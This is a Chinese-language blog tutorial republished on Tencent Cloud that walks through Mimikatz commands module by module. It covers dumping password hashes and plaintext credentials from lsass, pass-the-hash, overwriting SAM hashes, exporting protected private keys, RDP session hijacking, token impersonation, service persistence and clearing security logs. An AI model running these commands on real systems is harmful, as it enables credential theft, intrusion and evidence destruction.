首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Mimikatz 用法详解

Mimikatz 用法详解

作者头像
意大利的猫
发布于 2020-08-20 03:37:55
发布于 2020-08-20 03:37:55
4.2K0
举报
文章被收录于专栏:漫流砂漫流砂

最近看了苑老师讲解的mimikatz ,于是有了一下的这些总结

mimikatz 是黑客最喜欢使用的工具之一,甚至不亚于Nmap

遗憾的是作者是一个法国大哥,官网我是一点都看不懂,翻译过来也是乱七八糟,感谢苑老师讲解

模块化设计的一个工具

需要在管理员权限或者SYSTEM权限下使用

可以直接输入一个 ? 进入标准模块,不过标准模块并没有特别多的用处

privilege

privilege::debug

提升为debug权限

privilege::id 20

调整id来调整权限,debug 是20,driver是10

CRYPTO (导出未标记为可导出的证书)

一般私钥会被标记为不可导出,使用这个参数可以给系统打patch,之后就可以导出了

crypto::providers

查看加密提供者,因为在windows中有各种各样的加密,这个参数可以查看提供者

一般有 CryptoAPI和 CNG 两种,其重CNG较为古老

crypto::stores

证书存储,windows 系统中有很多证书存储,默认的是CURRENT_USER 这个证书存储

这个命令可以查看这些证书存储下都有什么

如果我们想指定某个证书存储(以local_machine为例)

crypto::stores /systemstore:local_machine

crypto::certificates

查看子存储有哪些证书

默认Current_USER

可以使用 crypto::certificates /store:Root 查看Root存储的具体的信息

除了直接查询,我们也可以导出证书信息(在mimikatz目录下)

crypto::certificates/store:Root /export

导出的公钥是DER格式的

导出的私钥是PFX格式的

密码 mimikatz

crypto::capi

给CryptoAPI打补丁,比较新的系统可以使用这个打补丁,之后就支持CryptoAPI导出了

crypto::cng

打 cng 补丁

crypto::sc

列出智能卡读卡器

crypto::keys

读取密钥

可以添加一下参数来进行选择性查看

/provider -

/providertype

/cngprovider

/export 导出密钥PVK files这个格式并不是我们平常的pem 格式,我们需要进一步转换

openssl rsa –inform pvk –in key.pvk–outform pem –out key.pem

sekurlsa

从lsass进程中提取passwords、keys、pin、tickets等信息

注意,既然是从内存中读取,那么就不会去SAM数据库读取,所以SAM数据库临时改动,只要内存中没有,那就读取不到

sekurlsa::msv

获取HASH (LM,NTLM)

sekurlsa::wdigest

通过可逆的方式去内存中读取明文密码

sekurlsa::Kerberos

假如域管理员正好在登陆了我们的电脑,我们可以通过这个命令来获取域管理员的明文密码

sekurlsa::tspkg

通过tspkg读取明文密码

sekurlsa::livessp

通过livessp 读取明文密码

sekurlsa::ssp

通过ssp 读取明文密码

sekurlsa::logonPasswords

通过以上各种方法读取明文密码

sekurlsa::process

将自己的进程切换到lsass进程中,之前只是注入读取信息

sekurlsa::minidump file

这个模块可以读取已经打包的内存信息

比如我们之前已经将lsass 进程中的内存信息保存为dmp 文件了,那么此时我们可以离线的读取其中的信息了

需要制定文件名

sekurlsa::pth

pass-the-hash

可以直接用hash来进行登录

sekurlsa::pth /user:administrator/domain:host1 /ntlm:cdf34cda4e455232323xxxx

sekurlsa::pth /user:administrator/domain:host1 /aes256:cdf34cda4e455232323xxxx

其中/domain 如果加入了域,那就填写域名,如果没有,那就写计算机名

执行后会在本地新开一个以hash身份的命令行窗口

process

进程模块

process::list

列出进程列表

process::exports

导出进程列表

process::imports

导入列表

process::start

开始一个进程

process::stop

停止一个程序

process::suspend

冻结一个进程

process::resume

从冻结中恢复

process::run notepad

运行一个程序

process::runp

以SYSTEM系统权限打开一个新的mimikatz窗口

lsadump

通过查询SAM数据库来读取HASH

lsadump::sam

lsadump::setntlm /user:zs/ntlm:a3c4c5bb4c32xxxx

直接修改zs 用户在SAM数据库中的HASH,这样就不需要破解密码了

service

服务管理

service::list

列出当前服务

service::+

mimikatz 将自己注册为一个系统服务,这样每次系统起来就会自动运行了

ts

终端服务 terminal service

ts::multirdp

默认非服务器系统,windows只允许一个用户登录,也就是说如果我让别人远程登录我的电脑,那么我就不能操作了

这个命令可以让其支持多个用户同时在线

ts::sessions

可以查看当前登录用户的登录信息

可以看到当前的登录sessions,并且每个session都有编号

ts::remote /id:1

此时会跳出当前用户的账号,在主界面可以看到session为1的那个账号的已经登录了,我们输入密码可以看到他的登录信息,比如他在打开哪些文件

event

关于日志的操作,比如清空安全日志中的所有日志

日志信息有很多,其中比较重要的是安全日志,其中包含xx在xx时间登录了

event:clear

清空安全日志

event:drop

避免新的日志继续产生(现在效果还不好,是一个试验性的功能)

misc

杂项功能

misc::cmd

misc::regedit

misc::taskmgr

打开cmd,注册表编辑器,任务管理器等

misc::clip

监听剪切板

执行之后会一直监听着,直到我们输入Ctrl+c

dpapi

基于密码系统级别的应用数据保护服务(密码/私钥)

支持以上使用数据保护的服务

token

令牌

token::whoami

查看我是谁

token::list

列出都有哪些登录了的账号

token::elevate /lab

假如lab域存在,我们可以假冒成为域管理员的token

token::revert

取消假冒

vault

vault::cred

查看系统凭据

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2018-11-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 NOP Team 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Mimikatz获取系统密码攻防研究
最新版下载地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180205/mimikatz_trunk.zip
用户1631416
2020/04/08
4.3K0
Mimikatz获取系统密码攻防研究
Mimikatz工具介绍
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能
不屈的杨
2024/08/18
6880
Mimikatz工具介绍
非官方Mimikatz指南和命令参考
Mimikatz是从Windows系统收集凭据数据的最佳工具之一.实际上,大多数认为Mimikatz是Windows凭据的"瑞士军刀"(或多功能工具),该工具可以完成所有任务.由于Mimikatz的作者Benjamin Delpy是法国人,因此,至少在他的博客上,大多数描述Mimikatz用法的资源都使用法语.该Mimikatz GitHub的库是英文的,包括命令使用的有用信息.
洛米唯熊
2020/05/29
2.7K0
什么是渗透_mitotracker deep red
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
全栈程序员站长
2022/09/20
7200
什么是渗透_mitotracker deep red
Windows系统安全|Windows中获取用户密码
Windows系统使用两种方法对用户的密码进行哈希处理,它们分别是 LAN Manager(LM)哈希和 NT LAN Manager(NTLM)哈希。所谓哈希(hash),就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。
谢公子
2022/01/19
3.1K0
Windows系统安全|Windows中获取用户密码
内网渗透之内网权限维持
原理:当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这样会在域内的所有账号中添加一个相同的 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。
红队蓝军
2025/02/12
2260
内网渗透之内网权限维持
内网渗透—获取Windows内Hash密码方法总结 | 美创安全实验室
在内网渗透中,当攻击者获取到内网某台机器的控制权后,会议被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制欲环境下的全部机器。
数据安全
2020/08/21
2.9K0
内网渗透—获取Windows内Hash密码方法总结 | 美创安全实验室
内网渗透之内网权限维持
随着企业信息化程度的加深,内网环境逐渐成为攻击者的关注的重点目标,在内网渗透的过程中权限维持是不可或缺的关键环节之一,它往往决定了攻击者能否在目标系统中长时间潜伏,获取敏感信息或者造成更大范围的破坏。本文旨在深入探讨内网渗透中的权限维持技术,包括其基本概念、常见手段以及防御措施
Al1ex
2024/08/20
4360
内网渗透之内网权限维持
Windows密码凭证获取学习
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/08/11
2.2K0
Windows密码凭证获取学习
权限维持分析及防御
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是权限维持分析及防御,分析了常见的针对操作系统后门、Web后门及域后门(白银票据、黄金票据等)的攻击手段,并给出了相应的检测和防范方法
中龙技术
2022/09/29
1.2K0
权限维持分析及防御
Windows - Hash散列值抓取方法
LM Hash(LAN Manager Hash)其本质是 DES 加密。在 Windows 2008 及开始之后默认禁用的是 LM Hash。
渗透攻击红队
2020/11/25
2.1K0
Windows - Hash散列值抓取方法
内网渗透-导出HASH的多种方式
在内网渗透中当我们得到一台高权限用户的身份时,就可以抓取到当前机器上的各类密码。虽然任务要求是导出域hash的方式,但在内网渗透中,获取当前机器的hash也有可能获取到域用户的hash,因此这里也分析一下如何获取当前机器的明文密码。
亿人安全
2024/08/13
7810
内网渗透-导出HASH的多种方式
横向移动
在内网渗透过程中,当得到内网中某一台机器权限后,如果需要进一步的扩大攻击范围,那么这时候就需要进行横向移动,以被攻陷的主机作为跳板,来访问域内其他主机.通过此类攻击手段,最终可能会获得域控制器(DC)的访问权限及重要数据.
鸿鹄实验室
2022/11/02
2.5K0
横向移动
【权限维持】域控后门&SSP&HOOK&DSRM&SID&万能钥匙
C:\Windows\System32\mimilsa.log 记录登录的账号密码 这里切换一下用户查看mimilsa.log文件
没事就要多学习
2024/07/18
1930
【权限维持】域控后门&SSP&HOOK&DSRM&SID&万能钥匙
获取Windows系统密码凭证总结
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2024/03/06
1.4K0
获取Windows系统密码凭证总结
凭据收集总结
本来按计划应该学习横向移动,但是发现一个问题,如何横向?这就是我记录这一章的目的,提升权限之后获取凭证,利用已获取的凭证扩大战果才是正确的姿势,学习的主要资料是参考链接中的分享,建议阅读参考的原文,再次说明,我的只是笔记,记录我的学习过程中的所思所想。
重生信息安全
2020/07/07
6.5K0
凭据收集总结
内网学习笔记 | 密码抓取
Windows 系统一般使用两种方法对用户的密码进行加密处理,在域环境中,用户的密码信息以哈希值的密文形式存储在 ntds.dit 二进制文件中,该文件位于 %SystemRoot%\ntds\ntds.dit 路径下,由于该文件一直被活动目录访问,因此这个文件是被系统禁止读取的。
TeamsSix
2022/09/20
2.4K0
内网学习笔记 | 密码抓取
window下抓取密码总结
无论是在我们渗透测试过程中(授权的情况下)还是在自己搭建的环境中进行攻防演练,获取服务器的明文密码或这hash值这一步骤非常重要,如果抓取到的密码是整个域内服务器的通用密码,那我们就可以不费吹灰之力拿到整个域控内的所有服务器。现在抓取密码的工具差不多都是exe、图形化工具、python写的工具等。
用户1631416
2019/05/05
2.3K0
window下抓取密码总结
从域认证协议以及密码凭据机制的角度来看内网渗透
Windows的登陆密码是储存在系统本地的SAM文件中的,在登陆Windows的时候,系统会将用户输入的密码与SAM文件中的密码进行对比,如果相同,则认证成功
亿人安全
2025/03/24
2580
从域认证协议以及密码凭据机制的角度来看内网渗透
Windows认证及抓密码总结
windows的认证方式主要有NTLM认证、Kerberos认证两种。同时,Windows Access Token记录着某用户的SID、组ID、Session、及权限等信息,也起到了权限认证的作用。
HACK学习
2019/08/06
1.8K0
Windows认证及抓密码总结
相关推荐
Mimikatz获取系统密码攻防研究
更多 >
交个朋友
加入腾讯云官网粉丝站
蹲全网底价单品 享第一手活动信息
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档